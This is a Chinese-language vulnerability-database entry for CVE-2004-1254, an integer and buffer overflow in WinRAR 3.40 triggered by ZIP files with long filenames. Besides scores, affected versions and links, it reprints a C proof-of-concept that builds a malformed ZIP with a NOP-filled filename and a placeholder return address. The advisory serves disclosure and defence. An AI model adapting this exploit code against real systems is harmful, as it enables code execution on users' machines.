CVE-2004-1254
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2009-06-13 00:22:40
NMCOE    

[原文]WinRAR 3.40, and possibly earlier versions, allows remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename, possibly causing an integer overflow that leads to a buffer overflow.


[CNNVD]rarlab WinRAR 缓冲区溢出漏洞(CNNVD-200501-074)

        WinRAR是一款较流行的压缩/解压工具,支持多种压缩文件格式。
        WinRAR 3.40及之前版本存在整数溢出漏洞。
        攻击者可利用包含长文件名文件的ZIP档,触发缓冲区溢出,从而执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:rarlab:winrar:3.20
cpe:/a:rarlab:winrar:3.10
cpe:/a:rarlab:winrar:3.11
cpe:/a:rarlab:winrar:3.40
cpe:/a:rarlab:winrar:3.10_beta5
cpe:/a:rarlab:winrar:3.0.0
cpe:/a:rarlab:winrar:3.41
cpe:/a:rarlab:winrar:3.10_beta3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1254
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1254
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-074
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/18569
(UNKNOWN)  XF  winrar-zip-file-bo(18569)
http://www.frsirt.com/exploits/20041217.Winrar.c.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20041217.Winrar.c.php

- 漏洞信息

rarlab WinRAR 缓冲区溢出漏洞
危急 缓冲区溢出
2005-01-10 00:00:00 2009-06-13 00:00:00
远程  
        WinRAR是一款较流行的压缩/解压工具,支持多种压缩文件格式。
        WinRAR 3.40及之前版本存在整数溢出漏洞。
        攻击者可利用包含长文件名文件的ZIP档,触发缓冲区溢出,从而执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.rarlab.com/download.htm

- 漏洞信息 (694)

WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC (EDBID:694)
windows local
2004-12-16 Verified
0 Vafa Khoshaein
N/A [点击下载]
/*
WinRAR 3.40 Buffer Overflow POC
Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
which I edited and made this code by.


Coded by Vafa Khoshaein - vkhoshain@hotmail.com
Vulnerability discovery date : December 10, 2004


Run this code and creat vulnerable_zip.zip then open the file in WinRAR 3.40
there exists a file, Try to delete the file - SECU


*/
#include <stdio.h>
#include <windows.h>


#pragma pack(1)



#define DATOS "vkhoshain@hotmail.com"


typedef struct {
DWORD Signature;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
}TOPHEADER;



typedef struct {
DWORD Signature;
WORD MadeVersion;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
WORD FileCommentLength;
WORD DiskNumberStart;
WORD InternalFileAttributes;
DWORD ExternalFileAttributes;
DWORD RelativeOffsetOfLocalHeader;
}MIDDLEHEADER;


typedef struct {
DWORD Signature;
WORD NumOfThisDisk;
WORD NumDisckStartCentralDirectory;
WORD NumEntriesCentralDirOnThisDisk;
WORD TotalNumEntriesCentralDir;
DWORD SizeCentralDirectory;
DWORD OffsetCentraDirRespectStartDiskNum;
WORD ZipCommentLength;
}BOTTOMHEADER;


int main(int argc,char *argv[]) {


FILE *ZipFile;
TOPHEADER *Cabecera1;
MIDDLEHEADER *Cabecera2;
BOTTOMHEADER *Cabecera3;


DWORD c;
UINT i;
char *filename;
char *url;
printf("\nWinRAR 3.40 Buffer Overflow POC\n");
printf("\nCoded by Vafa Khoshaein (vkhoshain@hotmail.com)\n");



if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {
printf("\nError in creating vulnerable_zip.zip\n");
exit(1);
}


c=30800;
filename=(char*)malloc(sizeof(char)*c);
memset(filename,0,sizeof(filename));



for( i=0;i<30800;i++) filename[i]=0x90;


// Return Address
memcpy(&filename[479],"AAAA",4); /////////// Ret Addr EIP 0x41414141


Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
memset(Cabecera1,0,sizeof(TOPHEADER));
memset(Cabecera2,0,sizeof(MIDDLEHEADER));
memset(Cabecera3,0,sizeof(BOTTOMHEADER));


Cabecera1->Signature=0x00000050; // DWORD
Cabecera1->VersionNeeded=0x000A; // WORD
Cabecera1->GeneralPurposeFlag=0x0002; // WORD
Cabecera1->CompressionMethod=0x0000; // WORD
Cabecera1->ModFileTime=0x1362; // WORD
Cabecera1->ModFileDate=0x3154; // WORD
Cabecera1->Crc32=0x85B36639; // DWORD
Cabecera1->CompressedSize=0x00000015; // DWORD
Cabecera1->UncompressedSize=0x00000015; // DWORD
Cabecera1->FilenameLength=(WORD)c; // WORD 0x0400
Cabecera1->ExtraFieldLength=0x0000; // WORD
Cabecera2->Signature=0x02014B50; // DWORD
Cabecera2->MadeVersion=0x0014; // WORD
Cabecera2->VersionNeeded=0x000A; // WORD
Cabecera2->GeneralPurposeFlag=0x0002; // WORD
Cabecera2->CompressionMethod=0x0000; // WORD
Cabecera2->ModFileTime=0x1362; // WORD
Cabecera2->ModFileDate=0x3154; // WORD
Cabecera2->Crc32=0x85B36639; // DWORD
Cabecera2->CompressedSize=0x00000015; // DWORD
Cabecera2->UncompressedSize=0x00000015; // DWORD
Cabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);
Cabecera2->ExtraFieldLength=0x0000; // WORD
Cabecera2->FileCommentLength=0x0000; // WORD
Cabecera2->DiskNumberStart=0x0000; // WORD
Cabecera2->InternalFileAttributes=0x0001; // WORD
Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD
Cabecera3->Signature=0x06054B50; // DWORD
Cabecera3->NumOfThisDisk=0x0000; // WORD
Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001;
Cabecera3->TotalNumEntriesCentralDir=0x0001;
Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c;
Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c;
Cabecera3->ZipCommentLength=0x0000;


fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);

fwrite(filename, c, 1,ZipFile);
fwrite(DATOS,strlen(DATOS),1,ZipFile);


fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);


fclose(ZipFile);
printf("\nvulnerable_zip.zip has been created\n\n");
return 1;
}

// milw0rm.com [2004-12-16]
		

- 漏洞信息

12550
WinRAR Delete Archived File Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in WinRar. WinRar fails to properly validate data resulting in a buffer overflow. When a user deletes a specific file from a specially crafted zip file, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2004-12-22 2004-12-10
2004-12-16 Unknow

- 解决方案

The vendor is aware of the vulnerability and has opted not to release a patch until the next scheduled release of the product.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站